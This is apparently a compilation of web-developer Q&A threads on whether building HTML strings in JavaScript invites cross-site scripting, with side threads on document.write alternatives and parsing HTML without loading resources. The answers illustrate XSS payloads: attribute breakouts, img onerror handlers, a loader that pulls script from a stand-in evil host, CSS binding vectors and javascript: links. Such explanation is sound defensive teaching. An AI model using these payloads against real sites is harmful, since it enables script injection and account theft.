Is it really insecure to build HTML strings in Javascript?

Is it really insecure to build HTML strings in Javascript? - javascript

The company who hosts our site reviews our code before deploying - they've recently told us this:
HTML strings should never be directly manipulated, as that opens us up to potential XSS holes. Instead, always use a DOM api to create elements...that can be jQuery or the direct DOM apis.
For example, instead of
this.html.push( '<a class="quiz-au" data-src="' + this.au + '"><span class="quiz-au-icon"></span>Click to play</a>' );
They tell us to do
var quizAuLink = $( 'a' );
quizAuLink.addClass( 'quiz-au' );
quizAuLink.data( 'src', this.au );
quizAu.text( 'Click to play' );
quizAu.prepend( '<span class="quiz-au-icon"></span>' );
Is this really true? Can anyone give us an example of an XSS attack that could exploit an HTML string like the first one?

If this.au is somehow modified, it might contain something like this:
"><script src="http://example.com/evilScript.js"></script><span class="
That'll mess up your HTML and inject a script:
<a class="quiz-au" data-src=""><script src="http://example.com/evilScript.js"></script><span class=""><span class="quiz-au-icon"></span>Click to play</a>
If you use DOM manipulation to set the src attribute, the script (or whatever other XSS you use) won't be executed, as it'll be properly escaped by the DOM API.
In response to some commentators who are saying that if someone could modify this.au, surely they could run the script on their own: I don't know where this.au is coming from, nor is it particularly relevant. It could be a value from the database, and the DB might have been compromised. It could also be a malicious user trying to mess things up for other users. It could even be an innocent non-techie who didn't realize that writing "def" > "abc" would destroy things.
One more thing. In the code you provided, var quizAuLink = $( 'a' ); will not create a new <a> element. It'll just select all the existing ones. You need to use var quizAuLink = $( '<a>' ); to create a new one.

This should be just as secure, without compromising too much on readability:
var link = $('<a class="quiz-au"><span class="quiz-au-icon"></span>Click to play</a>');
link.data("src", this.au);
The point is to avoid doing string operations to build HTML strings. Note that in above, I used $() only to parse a constant string, which parses to a well known result. In this example, only the this.au part is dangerous because it may contain dynamically calculated values.

As you cannot inject script tags in modern browsers using .innerHTML you will need to listen to an event:
If this.au is somehow modified, it might contain something like this:
"><img src="broken-path.png" onerror="alert('my injection');"><span class="
That'll mess up your HTML and inject a script:
<a class="quiz-au" data-src=""><img src="broken-path.png" onload="alert('my injection')"><span class=""><span class="quiz-au-icon"></span>Click to play</a>
And ofcause to run bigger chunks of JavaScript set onerror to:
var d = document; s = d.createElement('script'); s.type='text/javascript'; s.src = 'www.my-evil-path.com'; d.body.appendChild(s);
Thanks to Scimoster for the boilerplate

Security aside, when you build HTML in JavaScript you must make sure that it is valid. While it is possible to build and sanitize HTML by string manipulation*, DOM manipulation is far more convenient. Still, you must know exactly which part of your string is HTML and which is literal text.
Consider the following example where we have two hard-coded variables:
var href = "/detail?tag=hr&copy%5B%5D=1",
text = "The HTML <hr> tag";
The following code naively builds the HTML string:
var div = document.createElement("div");
div.innerHTML = '' + text + '';
console.log(div.innerHTML);
// The HTML <hr> tag
This uses jQuery but it is still incorrect (it uses .html() on a variable that was supposed to be text):
var div = document.createElement("div");
$("<a></a>").attr("href", href).html(text).appendTo(div);
console.log(div.innerHTML);
// The HTML <hr> tag
This is correct because it displays the text as intended:
var div = document.createElement("div");
$("<a></a>").attr("href", href).text(text).appendTo(div);
console.log(div.innerHTML);
// The HTML <hr> tag
Conclusion: Using DOM manipulation/jQuery do not guarantee any security, but it sure is one step in right direction.
* See this question for examples. Both string and DOM manipulation are discussed.

Related

how to check if html or script tags exist in input in javascript using RegEx

we want to prevent user to enter scrips or html tags input to avoid cross site script attack
for this i am writing this code but its seems not working
var preventScriptsRegEx = new RegExp("[^<>]*");
function getValue() {
return document.getElementById("myinput").value;
}
function test() {
alert(preventScriptsRegEx.test(getValue()));
}
this is inspired from this post : Prevent html tags entries in mvc textbox using regular expression

You can try creating a temporary element, set the input's value to the element's innerHTML property, and check the element's childElementCount:
function checkForHTML(text){
var elem = document.createElement('div')
elem.innerHTML = text;
return !!elem.childElementCount;
}
button.addEventListener('click', function(){
console.log(checkForHTML(input.value))
})
<input id="input">
<button id="button">Check</button>

Please don't do this. You can't just use some nifty RegExp to check for script injection. There are plenty of attack vectors where you can trick injections where RegExp simply cannot match well. This involves for example, using \u0001 UTF8 encodings or HTML entity encoding (< becomes & lt;, or & # 60; or & # x003C;) (lol in original post it even worked here...) which will pass your validation but automatically transformed so that execution is possible. I've been writing such exploits for fun, so I can guarantee you that there are almost as many ways to exploit such algorithms as there is creativity in a hackers/crackers mind.
The right way to protect yourself from such script injections/XSS is, to not trust user generated content in the first place. Do not trust "validation logic" as well. You shouldn't just accept HTML, JS or CSS code when it is somehow generated on the client side. Never. You should never save such content in a database, or transfer it by any other means and render it again. User generated content that is or could be in form of CSS, HTML or JS is evil and should be treated like a ticking nuclear bomb.
Every content that the client is sending to the server and that is re-rendered on client side in some way must not be sanitized but explicitly rendered via (htmlElement).innerText = user content (pseudo code); innerText is guaranteed to not create DOM nodes than TextNodes which is the only way to be sure that you're safe Never ever in-place render into HTML or CSS. Remark: I can also make CSS code XSS e.g. using vendor-specific CSS addons.
Example: behavior:url(script.htc); -moz-binding: url(script.xml#mycode);
Just never use .innerHTML = as well. Never let user generated code directly affect the DOM at all, never do < div > render($content) </ div > or anything like that.
For content that should be styled, use a DSL. It could be a JSON or any other DSL like Markdown etc. if you need a simple one, that splits text content from context information. Then, by code you trust, loop thru that data structure and render the HTML / DOM elements and always use .innerText or guaranteed .innerText use to render the user generated content (React for example is guaranteed to use that API except you're explicitly using innerHTML or dangerouslySetInnerHTML which is just sabotage). Also don't allow user generated content to set HTML element attributes. I can XSS that too.
Example: < a href="javascript:alert('XSS!')" / >

Why doesn't it format the javascript code? [duplicate]

In tutorials I've learnt to use document.write. Now I understand that by many this is frowned upon. I've tried print(), but then it literally sends it to the printer.
So what are alternatives I should use, and why shouldn't I use document.write? Both w3schools and MDN use document.write.

The reason that your HTML is replaced is because of an evil JavaScript function: document.write().
It is most definitely "bad form." It only works with webpages if you use it on the page load; and if you use it during runtime, it will replace your entire document with the input. And if you're applying it as strict XHTML structure it's not even valid code.
the problem:
document.write writes to the document stream. Calling document.write on a closed (or loaded) document automatically calls document.open which will clear the document.
-- quote from the MDN
document.write() has two henchmen, document.open(), and document.close(). When the HTML document is loading, the document is "open". When the document has finished loading, the document has "closed". Using document.write() at this point will erase your entire (closed) HTML document and replace it with a new (open) document. This means your webpage has erased itself and started writing a new page - from scratch.
I believe document.write() causes the browser to have a performance decrease as well (correct me if I am wrong).
an example:
This example writes output to the HTML document after the page has loaded. Watch document.write()'s evil powers clear the entire document when you press the "exterminate" button:
I am an ordinary HTML page. I am innocent, and purely for informational purposes. Please do not <input type="button" onclick="document.write('This HTML page has been succesfully exterminated.')" value="exterminate"/>
me!
the alternatives:
.innerHTML This is a wonderful alternative, but this attribute has to be attached to the element where you want to put the text.
Example: document.getElementById('output1').innerHTML = 'Some text!';
.createTextNode() is the alternative recommended by the W3C.
Example: var para = document.createElement('p');
para.appendChild(document.createTextNode('Hello, '));
NOTE: This is known to have some performance decreases (slower than .innerHTML). I recommend using .innerHTML instead.
the example with the .innerHTML alternative:
I am an ordinary HTML page.
I am innocent, and purely for informational purposes.
Please do not
<input type="button" onclick="document.getElementById('output1').innerHTML = 'There was an error exterminating this page. Please replace <code>.innerHTML</code> with <code>document.write()</code> to complete extermination.';" value="exterminate"/>
me!
<p id="output1"></p>

Here is code that should replace document.write in-place:
document.write=function(s){
var scripts = document.getElementsByTagName('script');
var lastScript = scripts[scripts.length-1];
lastScript.insertAdjacentHTML("beforebegin", s);
}

You can combine insertAdjacentHTML method and document.currentScript property.
The insertAdjacentHTML() method of the Element interface parses the specified text as HTML or XML and inserts the resulting nodes into the DOM tree at a specified position:
'beforebegin': Before the element itself.
'afterbegin': Just inside the element, before its first child.
'beforeend': Just inside the element, after its last child.
'afterend': After the element itself.
The document.currentScript property returns the <script> element whose script is currently being processed. Best position will be beforebegin — new HTML will be inserted before <script> itself. To match document.write's native behavior, one would position the text afterend, but then the nodes from consecutive calls to the function aren't placed in the same order as you called them (like document.write does), but in reverse. The order in which your HTML appears is probably more important than where they're place relative to the <script> tag, hence the use of beforebegin.
document.currentScript.insertAdjacentHTML(
'beforebegin',
'This is a document.write alternative'
)

As a recommended alternative to document.write you could use DOM manipulation to directly query and add node elements to the DOM.

Just dropping a note here to say that, although using document.write is highly frowned upon due to performance concerns (synchronous DOM injection and evaluation), there is also no actual 1:1 alternative if you are using document.write to inject script tags on demand.
There are a lot of great ways to avoid having to do this (e.g. script loaders like RequireJS that manage your dependency chains) but they are more invasive and so are best used throughout the site/application.

I fail to see the problem with document.write. If you are using it before the onload event fires, as you presumably are, to build elements from structured data for instance, it is the appropriate tool to use. There is no performance advantage to using insertAdjacentHTML or explicitly adding nodes to the DOM after it has been built. I just tested it three different ways with an old script I once used to schedule incoming modem calls for a 24/7 service on a bank of 4 modems.
By the time it is finished this script creates over 3000 DOM nodes, mostly table cells. On a 7 year old PC running Firefox on Vista, this little exercise takes less than 2 seconds using document.write from a local 12kb source file and three 1px GIFs which are re-used about 2000 times. The page just pops into existence fully formed, ready to handle events.
Using insertAdjacentHTML is not a direct substitute as the browser closes tags which the script requires remain open, and takes twice as long to ultimately create a mangled page. Writing all the pieces to a string and then passing it to insertAdjacentHTML takes even longer, but at least you get the page as designed. Other options (like manually re-building the DOM one node at a time) are so ridiculous that I'm not even going there.
Sometimes document.write is the thing to use. The fact that it is one of the oldest methods in JavaScript is not a point against it, but a point in its favor - it is highly optimized code which does exactly what it was intended to do and has been doing since its inception.
It's nice to know that there are alternative post-load methods available, but it must be understood that these are intended for a different purpose entirely; namely modifying the DOM after it has been created and memory allocated to it. It is inherently more resource-intensive to use these methods if your script is intended to write the HTML from which the browser creates the DOM in the first place.
Just write it and let the browser and interpreter do the work. That's what they are there for.
PS: I just tested using an onload param in the body tag and even at this point the document is still open and document.write() functions as intended. Also, there is no perceivable performance difference between the various methods in the latest version of Firefox. Of course there is a ton of caching probably going on somewhere in the hardware/software stack, but that's the point really - let the machine do the work. It may make a difference on a cheap smartphone though. Cheers!

The question depends on what you are actually trying to do.
Usually, instead of doing document.write you can use someElement.innerHTML or better, document.createElement with an someElement.appendChild.
You can also consider using a library like jQuery and using the modification functions in there: http://api.jquery.com/category/manipulation/

This is probably the most correct, direct replacement: insertAdjacentHTML.

Try to use getElementById() or getElementsByName() to access a specific element and then to use innerHTML property:
<html>
<body>
<div id="myDiv1"></div>
<div id="myDiv2"></div>
</body>
<script type="text/javascript">
var myDiv1 = document.getElementById("myDiv1");
var myDiv2 = document.getElementById("myDiv2");
myDiv1.innerHTML = "<b>Content of 1st DIV</b>";
myDiv2.innerHTML = "<i>Content of second DIV element</i>";
</script>
</html>

Use
var documentwrite =(value, method="", display="")=>{
switch(display) {
case "block":
var x = document.createElement("p");
break;
case "inline":
var x = document.createElement("span");
break;
default:
var x = document.createElement("p");
}
var t = document.createTextNode(value);
x.appendChild(t);
if(method==""){
document.body.appendChild(x);
}
else{
document.querySelector(method).appendChild(x);
}
}
and call the function based on your requirement as below
documentwrite("My sample text"); //print value inside body
documentwrite("My sample text inside id", "#demoid", "block"); // print value inside id and display block
documentwrite("My sample text inside class", ".democlass","inline"); // print value inside class and and display inline

I'm not sure if this will work exactly, but I thought of
var docwrite = function(doc) {
document.write(doc);
};
This solved the problem with the error messages for me.

Parse a HTML String with JS without triggering any page loads?

As this answer indicates, a good way to parse HTML in JavaScript is to simply re-use the browser's HTML-parsing capabilities like so:
var el = document.createElement( 'html' );
el.innerHTML = "<html><head><title>titleTest</title></head><body><a href='test0'>test01</a><a href='test1'>test02</a><a href='test2'>test03</a></body></html>";
// process 'el' as desired
However, this triggers loading extra pages for certain HTML strings, for example:
var foo = document.createElement('div')
foo.innerHTML = '<img src="http://example.com/img.png">';
As soon as this example is run, the browser attempts to load the page:
How might I process HTML from JavaScript without this behavior?

I don't know if there is a perfect solution for this, but since this is merely for processing, you can before assigning innerHTMl replace all src attributes to be notSrc="xyz.com", this way it wont be loaded, and if you need them later in processing you can account for this.
The browser mainly will load images, scripts, and css files, this will fix the first 2, the css can be done by replacing the href attribute.

If you want to parse HTML response without loading any unnecessary resources like images or scripts inside, use DOMImplementation’s createHTMLDocument() to create new document which is not connected to the current one parsed by the browser and behaves as well as normal document.

What's wrong with document.write? What's a viable alternative? [duplicate]

In tutorials I've learnt to use document.write. Now I understand that by many this is frowned upon. I've tried print(), but then it literally sends it to the printer.
So what are alternatives I should use, and why shouldn't I use document.write? Both w3schools and MDN use document.write.

The reason that your HTML is replaced is because of an evil JavaScript function: document.write().
It is most definitely "bad form." It only works with webpages if you use it on the page load; and if you use it during runtime, it will replace your entire document with the input. And if you're applying it as strict XHTML structure it's not even valid code.
the problem:
document.write writes to the document stream. Calling document.write on a closed (or loaded) document automatically calls document.open which will clear the document.
-- quote from the MDN
document.write() has two henchmen, document.open(), and document.close(). When the HTML document is loading, the document is "open". When the document has finished loading, the document has "closed". Using document.write() at this point will erase your entire (closed) HTML document and replace it with a new (open) document. This means your webpage has erased itself and started writing a new page - from scratch.
I believe document.write() causes the browser to have a performance decrease as well (correct me if I am wrong).
an example:
This example writes output to the HTML document after the page has loaded. Watch document.write()'s evil powers clear the entire document when you press the "exterminate" button:
I am an ordinary HTML page. I am innocent, and purely for informational purposes. Please do not <input type="button" onclick="document.write('This HTML page has been succesfully exterminated.')" value="exterminate"/>
me!
the alternatives:
.innerHTML This is a wonderful alternative, but this attribute has to be attached to the element where you want to put the text.
Example: document.getElementById('output1').innerHTML = 'Some text!';
.createTextNode() is the alternative recommended by the W3C.
Example: var para = document.createElement('p');
para.appendChild(document.createTextNode('Hello, '));
NOTE: This is known to have some performance decreases (slower than .innerHTML). I recommend using .innerHTML instead.
the example with the .innerHTML alternative:
I am an ordinary HTML page.
I am innocent, and purely for informational purposes.
Please do not
<input type="button" onclick="document.getElementById('output1').innerHTML = 'There was an error exterminating this page. Please replace <code>.innerHTML</code> with <code>document.write()</code> to complete extermination.';" value="exterminate"/>
me!
<p id="output1"></p>

Here is code that should replace document.write in-place:
document.write=function(s){
var scripts = document.getElementsByTagName('script');
var lastScript = scripts[scripts.length-1];
lastScript.insertAdjacentHTML("beforebegin", s);
}

You can combine insertAdjacentHTML method and document.currentScript property.
The insertAdjacentHTML() method of the Element interface parses the specified text as HTML or XML and inserts the resulting nodes into the DOM tree at a specified position:
'beforebegin': Before the element itself.
'afterbegin': Just inside the element, before its first child.
'beforeend': Just inside the element, after its last child.
'afterend': After the element itself.
The document.currentScript property returns the <script> element whose script is currently being processed. Best position will be beforebegin — new HTML will be inserted before <script> itself. To match document.write's native behavior, one would position the text afterend, but then the nodes from consecutive calls to the function aren't placed in the same order as you called them (like document.write does), but in reverse. The order in which your HTML appears is probably more important than where they're place relative to the <script> tag, hence the use of beforebegin.
document.currentScript.insertAdjacentHTML(
'beforebegin',
'This is a document.write alternative'
)

As a recommended alternative to document.write you could use DOM manipulation to directly query and add node elements to the DOM.

Just dropping a note here to say that, although using document.write is highly frowned upon due to performance concerns (synchronous DOM injection and evaluation), there is also no actual 1:1 alternative if you are using document.write to inject script tags on demand.
There are a lot of great ways to avoid having to do this (e.g. script loaders like RequireJS that manage your dependency chains) but they are more invasive and so are best used throughout the site/application.

The question depends on what you are actually trying to do.
Usually, instead of doing document.write you can use someElement.innerHTML or better, document.createElement with an someElement.appendChild.
You can also consider using a library like jQuery and using the modification functions in there: http://api.jquery.com/category/manipulation/

This is probably the most correct, direct replacement: insertAdjacentHTML.

Try to use getElementById() or getElementsByName() to access a specific element and then to use innerHTML property:
<html>
<body>
<div id="myDiv1"></div>
<div id="myDiv2"></div>
</body>
<script type="text/javascript">
var myDiv1 = document.getElementById("myDiv1");
var myDiv2 = document.getElementById("myDiv2");
myDiv1.innerHTML = "<b>Content of 1st DIV</b>";
myDiv2.innerHTML = "<i>Content of second DIV element</i>";
</script>
</html>

Use
var documentwrite =(value, method="", display="")=>{
switch(display) {
case "block":
var x = document.createElement("p");
break;
case "inline":
var x = document.createElement("span");
break;
default:
var x = document.createElement("p");
}
var t = document.createTextNode(value);
x.appendChild(t);
if(method==""){
document.body.appendChild(x);
}
else{
document.querySelector(method).appendChild(x);
}
}
and call the function based on your requirement as below
documentwrite("My sample text"); //print value inside body
documentwrite("My sample text inside id", "#demoid", "block"); // print value inside id and display block
documentwrite("My sample text inside class", ".democlass","inline"); // print value inside class and and display inline

I'm not sure if this will work exactly, but I thought of
var docwrite = function(doc) {
document.write(doc);
};
This solved the problem with the error messages for me.

When are dynamic scripts executed?

I was doing the google XSS games (https://xss-game.appspot.com/level2), but I couldn't quite figure out why level 2 wasn't working the way I was expecting. Even though the hint says that script tags won't work, I didn't know why. My question is basically when are dynamic script tags executed and does this vary by browser?
I tried something simple as:
<script>alert();</script>
And while it adds the element to the page, it doesn't do what I had hoped.
I found this post which has the same problem, but the solution is just an answer, but not an explanation:
Dynamically added script will not execute

If a site sanitizes only SCRIPT tags but allows other HTML - it opens itself to XSS. The hint in the Level 2 is text in the message window having some HTML formatting (italic, color etc.) so the assumption here - HTML tags are allowed.
So you can enter something like
<i>Hello Xss</i>
Into the message window to display text in italic. But a DOM element can have an event handler attached to it - you can include executable JavaScript into event handler without any SCRIPT tags.
Try entering this into message window:
<i onmouseover="alert(1)">Hello Xss</i>
and after submitting message wave mouse over your message text.

The answer to your question is that <script> tags added via .innerHTML do not execute.
From https://developer.mozilla.org/en-US/docs/Web/API/Element.innerHTML :
Security considerations
It is not uncommon to see innerHTML used to insert text in a web page. This comes with a security risk.
var name = "John";
// assuming el is an HTML DOM element
el.innerHTML = name; // harmless in this case
// ...
name = "<script>alert('I am John in an annoying alert!')</script>";
el.innerHTML = name; // harmless in this case
Although this may look like a cross-site scripting attack, the result is harmless. HTML5 specifies that a tag inserted via innerHTML should not execute.
However, there are ways to execute JavaScript without using elements, so there is still a security risk whenever you use innerHTML to set strings over which you have no control. For example:
var name = "<img src=x onerror=alert(1)>";
el.innerHTML = name; // shows the alert

Develop Reference

JavaScript is the programming language of the Web.